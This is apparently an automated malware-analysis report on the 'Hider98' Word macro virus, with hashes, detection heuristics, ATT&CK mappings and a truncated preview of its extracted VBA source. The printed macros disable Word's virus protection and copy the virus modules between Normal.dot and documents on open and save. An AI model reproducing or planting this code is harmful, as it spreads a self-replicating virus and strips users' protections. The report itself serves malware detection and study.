Hider98 — Office (OLE) malware analysis

Static analysis result for SHA-256 166b87d5f1c338eb…

MALICIOUS

Office (OLE)

Size: 96.0 KB
Created: 1998-06-12 13:52:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: bde238fa1d80aaa2232e46da1aff2f63
SHA-1: 8856e37100a698c64a70d07260681f691272cd8c
SHA-256: 166b87d5f1c338eb7459b222c9bf9ccc61a8f1a91cae1b2ff9d7c025992ca703
Risk score: 160

Malware Insights

Hider98 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains legacy WordBasic macro-virus markers and a VBA macro module named 'Hider98'. Its AutoOpen subroutine copies itself and two further components ('FileOp', 'FileSA') into the Normal template, which persists the macro across every subsequent Word session; if the components are already present in Normal, it copies them back into the active document instead, which is how the virus spreads to new files. The macro also displays a message box to the user, which serves as a lure or distraction.

Heuristics (4)

  • ClamAV: Doc.Trojan.Zmk-6 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Zmk-6
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    The document contains VBA macro code.
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    The document contains an AutoOpen macro, which runs automatically when the document is opened.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30652 bytes
SHA-256: 9077745c9688fe26a576bfcd18ec205437513646ce263f8da4db3e33ae2cb62c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hider98"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "Hider98" Then
        Hider98Installed = -1
    End If
Next i
If Not Hider98Installed Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
    MsgBox "Une surprise vous attend...", vbCritical, "Virus Hider98"
Else
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
End If
ErrorAO:
End Sub
Sub FileOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFO
Dim MyDate
Randomize
MyDate = Date
D$ = Mid(MyDate, 1, 2)
NHD$ = Int(Rnd * 31) + 1
If NHD$ = "1" Then NHD$ = "01"
If NHD$ = "2" Then NHD$ = "02"
If NHD$ = "3" Then NHD$ = "03"
If NHD$ = "4" Then NHD$ = "04"
If NHD$ = "5" Then NHD$ = "05"
If NHD$ = "6" Then NHD$ = "06"
If NHD$ = "7" Then NHD$ = "07"
If NHD$ = "8" Then NHD$ = "08"
If NHD$ = "9" Then NHD$ = "09"
If D$ = NHD$ Then
    FileOp.Show
    MsgBox "ZeMacroKiller98 est heureux de vous dédier ce nouveau virus.", vbInformation, "Virus Hider98"
Else
    Dialogs(wdDialogFileOpen).Show
End If
ErrorFO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
Dim MyDate, Valeur$
Randomize
MyDate = Date
D$ = Mid(MyDate, 1, 2)
NHD$ = Int(Rnd * 31) + 1
If NHD$ = "1" Then NHD$ = "01"
If NHD$ = "2" Then NHD$ = "02"
If NHD$ = "3" Then NHD$ = "03"
If NHD$ = "4" Then NHD$ = "04"
If NHD$ = "5" Then NHD$ = "05"
If NHD$ = "6" Then NHD$ = "06"
If NHD$ = "7" Then NHD$ = "07"
If NHD$ = "8" Then NHD$ = "08"
If NHD$ = "9" Then NHD$ = "09"
If D$ = NHD$ Then
Debut:
    FileSA.Show
    Valeur$ = WordBasic.[GetPrivateProfileString$]("FileSA", "Choix", "WIN.INI")
    If Valeur$ <> "1" Then
        GoTo Debut
    End If
Else
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.Save
End If
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCanc
... (truncated)